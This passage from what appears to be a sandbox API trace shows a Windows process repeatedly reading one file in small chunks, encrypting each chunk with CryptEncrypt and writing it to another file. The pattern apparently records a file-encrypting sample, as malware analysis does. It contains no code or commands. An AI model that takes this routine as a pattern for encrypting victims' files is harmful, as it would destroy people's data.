hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.738] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.738] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.738] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.739] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.739] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.739] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.739] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.739] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.739] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.740] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.740] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.740] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.740] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.740] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.740] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.741] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.741] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.741] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.741] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.741] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.742] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.742] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.742] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.742] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.742] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.742] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.743] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.743] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.743] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.743] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.743] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.743] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.743] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.744] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.744] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.744] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.744] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.744] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.745] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.745] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 